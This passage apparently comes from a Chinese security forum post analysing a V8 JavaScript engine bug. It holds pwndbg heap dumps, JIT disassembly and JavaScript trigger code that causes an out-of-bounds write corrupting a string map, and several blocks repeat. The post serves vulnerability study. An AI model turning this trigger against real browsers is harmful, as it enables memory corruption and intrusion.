   0x2c6522e06cc4    mov    rax, qword ptr [rax + 0xf]      RAX, [0x3e4915602250] => 0x3f7561c02361 ◂— 0x3f7561c022
   0x2c6522e06cc8    vmovsd qword ptr [rax + 7], xmm0
   0x2c6522e06ccd    movabs r10, 0x3e4915602311             R10 => 0x3e4915602311 ◂— 0x3f7561c024
   0x2c6522e06cd7    push   r10
   0x2c6522e06cd9    movabs rdi, 0xbc7b438d851              RDI => 0xbc7b438d851 ◂— 0x410000196777e82a
   0x2c6522e06ce3    mov    rsi, qword ptr [rbp - 0x18]     RSI, [0x7ffd0ebafdf8] => 0xbc7b4383951 ◂— 0x3f7561c02c
 
pwndbg> job $rax
0x13869995c4f1: [JSSet]
 - map = 0x4332306509 [FastProperties]
 - prototype = 0x3bf28ee15e49
 - elements = 0xcd748382241 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS] - table = 0x13869995c511 <FixedArray[13]>
 - properties = {
 }
pwndbg>  x/4gx $rax-1
0x13869995c4f0: 0x0000004332306509      0x00000cd748382241
0x13869995c500: 0x00000cd748382241      0x000013869995c511
pwndbg> job 0x00000cd748382241
0xcd748382241: [FixedArray]
 - length: 0
pwndbg> x/6gx 0x00000cd748382240
0xcd748382240:  0x00000b1cecb02309      0x0000000000000000
0xcd748382250:  0x00000b1cecb02361      0x00000000803b1506
0xcd748382260:  0x0000000400000000      0xdeadbeed6c6c756e
pwndbg> x/6gx 0x00000cd748382240
0xcd748382240:  0x00000b1cecb02309      0x0000000000000000
0xcd748382250:  0x00000b1cecb02361      0x00000000803b1506
0xcd748382260:  0x0000000400000000      0xdeadbeed6c6c756e
pwndbg> job 0x00000b1cecb02309
0xb1cecb02309: [Map]
 - type: FIXED_ARRAY_TYPE
 - instance size: 0
 - elements kind: FAST_HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - non-extensible
 - back pointer: 0xcd748382311 <undefined>
 - instance descriptors (own) #0: 0xcd748382231 <FixedArray[0]>
 - layout descriptor: 0
 - prototype: 0xcd748382201 <null>
 - constructor: 0xcd748382201 <null>
 - code cache: 0xcd748382241 <FixedArray[0]>
 - dependent code: 0xcd748382241 <FixedArray[0]>
 - construction counter: 0
 
pwndbg> job 0x00000b1cecb02361
0xb1cecb02361: [Map]
 - type: ONE_BYTE_INTERNALIZED_STRING_TYPE
 - instance size: 0
 - elements kind: FAST_HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0xcd748382311 <undefined>
 - instance descriptors (own) #0: 0xcd748382231 <FixedArray[0]>
 - layout descriptor: 0
 - prototype: 0xcd748382201 <null>
 - constructor: 0xcd748382201 <null>
 - code cache: 0xcd748382241 <FixedArray[0]>
 - dependent code: 0xcd748382241 <FixedArray[0]>
 - construction counter: 0
pwndbg> job 0x00000b1cecb02309
0xb1cecb02309: [Map]
 - type: FIXED_ARRAY_TYPE
 - instance size: 0
 - elements kind: FAST_HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - non-extensible
 - back pointer: 0xcd748382311 <undefined>
 - instance descriptors (own) #0: 0xcd748382231 <FixedArray[0]>
 - layout descriptor: 0
 - prototype: 0xcd748382201 <null>
 - constructor: 0xcd748382201 <null>
 - code cache: 0xcd748382241 <FixedArray[0]>
 - dependent code: 0xcd748382241 <FixedArray[0]>
 - construction counter: 0
 
pwndbg> job 0x00000b1cecb02361
0xb1cecb02361: [Map]
 - type: ONE_BYTE_INTERNALIZED_STRING_TYPE
 - instance size: 0
 - elements kind: FAST_HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0xcd748382311 <undefined>
 - instance descriptors (own) #0: 0xcd748382231 <FixedArray[0]>
 - layout descriptor: 0
 - prototype: 0xcd748382201 <null>
 - constructor: 0xcd748382201 <null>
 - code cache: 0xcd748382241 <FixedArray[0]>
 - dependent code: 0xcd748382241 <FixedArray[0]>
 - construction counter: 0
pwndbg> x/6gx 0x00000cd748382240
0xcd748382240:  0x00000b1cecb02309 (FIXED_ARRAY_TYPE)                       0x0000000000000000
0xcd748382250:  0x00000b1cecb02361 (ONE_BYTE_INTERNALIZED_STRING_TYPE)      0x00000000803b1506
0xcd748382260:  0x0000000400000000                                          0xdeadbeed6c6c756e
pwndbg> x/6gx 0x00000cd748382240
0xcd748382240:  0x00000b1cecb02309 (FIXED_ARRAY_TYPE)                       0x0000000000000000
0xcd748382250:  0x00000b1cecb02361 (ONE_BYTE_INTERNALIZED_STRING_TYPE)      0x00000000803b1506
0xcd748382260:  0x0000000400000000                                          0xdeadbeed6c6c756e
   0x3c1871406cc0    mov    rax, qword ptr [rax + 7]         RAX, [0x13869995c4f8] => 0xcd748382241 ◂— 0xb1cecb023
   0x3c1871406cc4    mov    rax, qword ptr [rax + 0xf]       RAX, [0xcd748382250] => 0xb1cecb02361 ◂— 0xb1cecb022
 ► 0x3c1871406cc8    vmovsd qword ptr [rax + 7], xmm0
   0x3c1871406ccd    movabs r10, 0xcd748382311               R10 => 0xcd748382311 ◂— 0xb1cecb024
 
pwndbg> x/6gx $rax-1
0xb1cecb02360:  0x00000b1cecb02259      0x0019000400007300  <- 所以,越界写是写到了这个位置
0xb1cecb02370:  0x00000000082003ff      0x00000cd748382201
0xb1cecb02380:  0x00000cd748382201      0x0000000000000000
   0x3c1871406cc0    mov    rax, qword ptr [rax + 7]         RAX, [0x13869995c4f8] => 0xcd748382241 ◂— 0xb1cecb023
   0x3c1871406cc4    mov    rax, qword ptr [rax + 0xf]       RAX, [0xcd748382250] => 0xb1cecb02361 ◂— 0xb1cecb022
 ► 0x3c1871406cc8    vmovsd qword ptr [rax + 7], xmm0
   0x3c1871406ccd    movabs r10, 0xcd748382311               R10 => 0xcd748382311 ◂— 0xb1cecb024
 
pwndbg> x/6gx $rax-1
0xb1cecb02360:  0x00000b1cecb02259      0x0019000400007300  <- 所以,越界写是写到了这个位置
0xb1cecb02370:  0x00000000082003ff      0x00000cd748382201
0xb1cecb02380:  0x00000cd748382201      0x0000000000000000
pwndbg> x/6gx $rax-1
0xb1cecb02360:  0x00000b1cecb02259      0x41e04d0a5e800000 <- 成功溢出,破坏了 ONE_BYTE_INTERNALIZED_STRING_TYPE 结构
0xb1cecb02370:  0x00000000082003ff      0x00000cd748382201
0xb1cecb02380:  0x00000cd748382201      0x0000000000000000
 
# 此时再去用 job 命令解析结构,也会失败:
pwndbg> job 0xb1cecb02361
0xb1cecb02361: [Map]
 - type: EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE
 - instance size: 0
 - elements kind:
#
# Fatal error in ../../src/elements.h, line 28
# Check failed: static_cast<int>(elements_kind) < kElementsKindCount.
pwndbg> x/6gx $rax-1
0xb1cecb02360:  0x00000b1cecb02259      0x41e04d0a5e800000 <- 成功溢出,破坏了 ONE_BYTE_INTERNALIZED_STRING_TYPE 结构
0xb1cecb02370:  0x00000000082003ff      0x00000cd748382201
0xb1cecb02380:  0x00000cd748382201      0x0000000000000000
 
# 此时再去用 job 命令解析结构,也会失败:
pwndbg> job 0xb1cecb02361
0xb1cecb02361: [Map]
 - type: EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE
 - instance size: 0
 - elements kind:
#
# Fatal error in ../../src/elements.h, line 28
# Check failed: static_cast<int>(elements_kind) < kElementsKindCount.
function Check(obj) {
    n.xyz = 3.4766863919152113e-308;   
    n.xyz1 = 0x0;               
    n.xyz2 = 0x7000;
    n.xyz3 = obj;
}
for (var i = 0; i < 10000; ++i) {
    Check(null);
}
function Check(obj) {
    n.xyz = 3.4766863919152113e-308;   
    n.xyz1 = 0x0;               
    n.xyz2 = 0x7000;
    n.xyz3 = obj;
}
for (var i = 0; i < 10000; ++i) {
    Check(null);
}
0x211408780d    45  488b400f       REX.W movq rax,[rax+0xf]
0x2114087811    49  49ba0073000004001900 REX.W movq r10,0x19000400007300
0x211408781b    59  c4c1f96ec2     vmovq xmm0,r10
0x2114087820    64  488b5807       REX.W movq rbx,[rax+0x7]
0x2114087824    68  488b5b0f       REX.W movq rbx,[rbx+0xf]
0x2114087828    72  c5fb114307     vmovsd [rbx+0x7],xmm0      // n.xyz
0x211408782d    77  488b5807       REX.W movq rbx,[rax+0x7]
0x2114087831    81  c7431b00000000 movl [rbx+0x1b],0x0        // n.xyz1
0x2114087838    88  488b5807       REX.W movq rbx,[rax+0x7]
0x211408783c    92  c7432300700000 movl [rbx+0x23],0x7000     // n.xyz2
0x2114087843    99  488b5d10       REX.W movq rbx,[rbp+0x10]
0x2114087847   103  f6c301         testb rbx,0x1
0x211408784a   106  0f843f000000   jz 175  (0x211408788f)
0x2114087850   112  488b5007       REX.W movq rdx,[rax+0x7]
0x2114087854   116  48895a27       REX.W movq [rdx+0x27],rbx  //n.xyz3
0x211408780d    45  488b400f       REX.W movq rax,[rax+0xf]
0x2114087811    49  49ba0073000004001900 REX.W movq r10,0x19000400007300
0x211408781b    59  c4c1f96ec2     vmovq xmm0,r10
0x2114087820    64  488b5807       REX.W movq rbx,[rax+0x7]
0x2114087824    68  488b5b0f       REX.W movq rbx,[rbx+0xf]
0x2114087828    72  c5fb114307     vmovsd [rbx+0x7],xmm0      // n.xyz
0x211408782d    77  488b5807       REX.W movq rbx,[rax+0x7]
0x2114087831    81  c7431b00000000 movl [rbx+0x1b],0x0        // n.xyz1
0x2114087838    88  488b5807       REX.W movq rbx,[rax+0x7]
0x211408783c    92  c7432300700000 movl [rbx+0x23],0x7000     // n.xyz2
0x2114087843    99  488b5d10       REX.W movq rbx,[rbp+0x10]
0x2114087847   103  f6c301         testb rbx,0x1
0x211408784a   106  0f843f000000   jz 175  (0x211408788f)
0x2114087850   112  488b5007       REX.W movq rdx,[rax+0x7]
0x2114087854   116  48895a27       REX.W movq [rdx+0x27],rbx  //n.xyz3
function Check(obj) {
    n.xyz = 3.4766863919152113e-308;   
    n.xyz1 = 3.5766863919152113e-308;               
    n.xyz2 = 3.6766863919152113e-308;
    n.xyz3 = obj;
}
for (var i = 0; i < 10000; ++i) {
    Check(3.4766863919152113e-308);
}
function Check(obj) {
    n.xyz = 3.4766863919152113e-308;   
    n.xyz1 = 3.5766863919152113e-308;               
    n.xyz2 = 3.6766863919152113e-308;
    n.xyz3 = obj;
}
for (var i = 0; i < 10000; ++i) {
    Check(3.4766863919152113e-308);
}
0x14de39186f6d    45  488b400f       REX.W movq rax,[rax+0xf]
0x14de39186f71    49  49ba0073000004001900 REX.W movq r10,0x19000400007300
0x14de39186f7b    59  c4c1f96ec2     vmovq xmm0,r10
0x14de39186f80    64  488b5807       REX.W movq rbx,[rax+0x7]
0x14de39186f84    68  488b5b0f       REX.W movq rbx,[rbx+0xf]
0x14de39186f88    72  c5fb114307     vmovsd [rbx+0x7],xmm0    // n.xyz
0x14de39186f8d    77  49baaf70697219b81900 REX.W movq r10,0x19b819726970af
0x14de39186f97    87  c4c1f96ec2     vmovq xmm0,r10
0x14de39186f9c    92  488b5807       REX.W movq rbx,[rax+0x7]
0x14de39186fa0    96  488b5b17       REX.W movq rbx,[rbx+0x17]
0x14de39186fa4   100  c5fb114307     vmovsd [rbx+0x7],xmm0    // n.xyz1
0x14de39186fa9   105  49ba5d6ed2e42e701a00 REX.W movq r10,0x1a702ee4d26e5d
0x14de39186fb3   115  c4c1f96ec2     vmovq xmm0,r10
0x14de39186fb8   120  488b5807       REX.W movq rbx,[rax+0x7]
0x14de39186fbc   124  488b5b1f       REX.W movq rbx,[rbx+0x1f]
0x14de39186fc0   128  c5fb114307     vmovsd [rbx+0x7],xmm0    // n.xyz2
0x14de39186fc5   133  488b4007       REX.W movq rax,[rax+0x7]
0x14de39186fc9   137  488b4027       REX.W movq rax,[rax+0x27]
0x14de39186fcd   141  488b5d10       REX.W movq rbx,[rbp+0x10]
0x14de39186fd1   145  f6c301         testb rbx,0x1
0x14de39186fd4   148  7415           jz 171  (0x14de39186feb)
0x14de39186fd6   150  4d8b5560       REX.W movq r10,[r13+0x60]
0x14de39186fda   154  4c3953ff       REX.W cmpq [rbx-0x1],r10
0x14de39186fde   158  c5fb104307     vmovsd xmm0,[rbx+0x7]
0x14de39186fe3   163  0f8528000000   jnz 209  (0x14de39187011)
0x14de39186fe9   169  eb10           jmp 187  (0x14de39186ffb)
0x14de39186feb   171  4c8bd3         REX.W movq r10,rbx
0x14de39186fee   174  49c1ea20       REX.W shrq r10, 32
0x14de39186ff2   178  c5f957c0       vxorpd xmm0,xmm0,xmm0
0x14de39186ff6   182  c4c17b2ac2     vcvtlsi2sd xmm0,xmm0,r10
0x14de39186ffb   187  c5fb114007     vmovsd [rax+0x7],xmm0    // n.xyz3
0x14de39186f6d    45  488b400f       REX.W movq rax,[rax+0xf]
0x14de39186f71    49  49ba0073000004001900 REX.W movq r10,0x19000400007300

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2024-8-25 22:16 被JoJoRun编辑 ,原因:
收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//